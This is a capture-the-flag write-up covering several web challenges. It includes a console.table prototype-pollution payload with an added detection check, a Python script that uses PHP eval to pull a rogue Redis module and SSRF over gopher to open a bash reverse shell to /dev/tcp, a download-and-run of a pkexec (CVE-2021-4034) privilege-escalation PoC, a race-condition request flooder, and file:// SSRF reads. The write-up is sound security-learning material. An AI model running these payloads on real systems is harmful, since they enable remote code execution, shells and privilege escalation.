GameV4.0
The flag is base64-encoded in the data.js source; decode it to get the flag.
gocalc0
Send any test payload and decode the returned session; the decoded session contains the flag.
Expected solution: https://blog.csdn.net/cosmoslin/article/details/122930836
newcalc0
The flag is returned once a check on Object.prototype passes, which points to prototype pollution being the intended route; console.log is also available. Use CVE-2022-21824 (console.table prototype pollution):
console.table([{x:1}], ["__proto__"]);
After submitting, you can access /flag
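An added illustration of why that payload works, not code from the writeup or from Node itself: a reduced model of how console.table built its per-column map before the CVE-2022-21824 fix, beside the fixed variant, plus a check that reports any own property a call left behind on Object.prototype.

```javascript
// Reduced model of console.table's column-map construction (not Node's real
// code). `rows` is the tabular data, `properties` the caller-supplied column
// list, `createMap` decides what kind of object backs the map.
function buildColumnMap(rows, properties, createMap) {
  const map = createMap();
  for (let i = 0; i < rows.length; i++) {
    const item = rows[i];
    const keys = properties || Object.keys(item);
    for (const key of keys) {
      // With a plain {} map, map["__proto__"] is Object.prototype, not
      // undefined, so the write below lands on Object.prototype[i].
      if (map[key] === undefined) map[key] = [];
      if (!Object.prototype.hasOwnProperty.call(item, key)) map[key][i] = '';
      else map[key][i] = String(item[key]);
    }
  }
  return map;
}

const vulnerableMap = () => ({});            // pre-fix: inherits from Object.prototype
const fixedMap = () => Object.create(null);  // fix: "__proto__" is an ordinary key

// Defender-side check: run fn and report own properties it added to
// Object.prototype, removing them again so later code is unaffected.
function prototypeKeysAddedBy(fn) {
  const before = new Set(Object.getOwnPropertyNames(Object.prototype));
  fn();
  const added = Object.getOwnPropertyNames(Object.prototype).filter(k => !before.has(k));
  for (const k of added) delete Object.prototype[k];
  return added;
}

// The writeup's payload: console.table([{x:1}], ["__proto__"])
const rows = [{ x: 1 }];
console.log(prototypeKeysAddedBy(() => buildColumnMap(rows, ['__proto__'], vulnerableMap))); // [ '0' ]
console.log(prototypeKeysAddedBy(() => buildColumnMap(rows, ['__proto__'], fixedMap)));      // []
```

The same check run before and after any untrusted call is a cheap way to detect pollution of the global prototype in a test suite.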
InterestingPHP
Many functions are disabled (see phpinfo) and there is no file read/write outside the current directory. List the current directory:
/?exp=print_r(scandir("./"));
A configuration file is present; reading it gives the redis key (the AUTH password):
/?exp=highlight_file('secret.rdb');
With the key, redis can load a module for RCE: https://xz.aliyun.com/t/5665#toc-14
import requests

# The exp parameter evaluates PHP, so the actual code is sent in POST field 1
url = "http://8c7c47d3-ff45-4aea-8a5e-a2d363a1eb5d.node4.buuoj.cn:81/?exp=eval($_POST[1]);"
headers = {"content-type": "application/x-www-form-urlencoded"}


def encoder_url(data):
    # Percent-encode every character for the gopher:// URL. Redis inline
    # commands are CRLF-terminated, so a newline becomes %0d%0a.
    encoder = ""
    for single_char in data:
        if single_char == "\n":
            encoder += "%0d%0a"
        else:
            encoder += "%{:02x}".format(ord(single_char))
    return encoder


# Location of the module on the VPS ("ip" is a placeholder)
so = "http://ip:7777/exp.so"

# PHP that fetches a URL with curl and writes the response to ./exp.so
payload = '''
function getSslPage($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($ch);
    curl_close($ch);
    file_put_contents("exp.so", $result);
}
getSslPage("%s");
'''.strip()

# Step 1: download the module into the web directory
data = {1: payload % so}
fh = requests.post(url, data, headers=headers).text.strip()
print(fh)

# Step 2: SSRF to redis over gopher, authenticate and load the module
gopher = "gopher://127.0.0.1:8888/_"
commands = '''
auth ye_w4nt_a_gir1fri3nd
config set dbfilename 666.rdb
module load ./exp.so
system.exec 'bash -c "bash -i >& /dev/tcp/ip/7999 0>&1"'
'''
payload1 = gopher + encoder_url(commands)
data1 = {1: payload % payload1}
fh1 = requests.post(url, data1, headers=headers).text.strip()
print(fh1)
The .so file used here comes from https://github.com/n0b0dyCN/redis-rogue-server.
Before running the script, place the .so file on the VPS and serve it over HTTP:
python3 -m http.server 7777
After getting a shell, the current user has no permission to read the flag, so use the recent pkexec privilege escalation (CVE-2021-4034).
Put cve-2021-4034-poc.c from https://github.com/arthepsy/CVE-2021-4034 on the VPS,
then fetch, compile and run it on the target:
curl http://118.31.76.240:7777/cve-2021-4034-poc.c > cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
easyJava[reproduce]
Reading web.xml directly gives no useful information, so read the classes directory instead:
/file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml
/file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes
Look at HelloWorldServlet first. To get the flag, the key must be correct and the fields of the deserialized user object must match this.user.
Let's first look at how to get the key. In doGet, the if check and the else branch act on the same shared state, so they conflict.
The key is only returned in the else branch, which is reached when the check fails; the correct name can be obtained through a race condition.
Servlet thread safety problem
# -*- coding: UTF-8 -*-
import requests
import threading

host = "http://aafc6475-042c-4bf7-827e-4f577bb2838d.node4.buuoj.cn:81/"


class myThread(threading.Thread):
    def __init__(self, name):
        threading.Thread.__init__(self)
        self.name = name

    def run(self):
        print("Starting thread: " + self.name)
        runing(self.name)
        print("Exiting thread: " + self.name)


def runing(name):
    # Hammer the endpoint with one name per thread until the race lands
    # and the response leaks the key
    while True:
        r = requests.get(host + "/evi1?name=%s" % name)
        r.encoding = "utf-8"
        if r.text.find("The Key is") != -1:
            print(r.text)
            return 0


# Create new threads
thread1 = myThread("asdqwer")
thread2 = myThread("vnctf2022")
# Start the threads
thread1.start()
thread2.start()
thread1.join()
thread2.join()
Then serialize a User object directly so that this.user.equals(u) holds:
package Payload;

import entity.User;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.Base64;
import util.SerAndDe;

public class Ser {
    public static void main(String[] args) throws IOException {
        // Build a User equal to this.user, serialize it and base64-encode the bytes
        User user = new User("m4n_q1u_666", "666", "180");
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(user);
        byte[] ser = bos.toByteArray();
        Base64.Encoder encoder = Base64.getEncoder();
        String encodedText = encoder.encodeToString(ser);
        System.out.println(encodedText);
        // Round-trip check with the challenge's own helper
        User user2 = (User) SerAndDe.deserialize(ser);
        System.out.println(user2);
    }
}
Finally, submit the key together with the generated base64 string.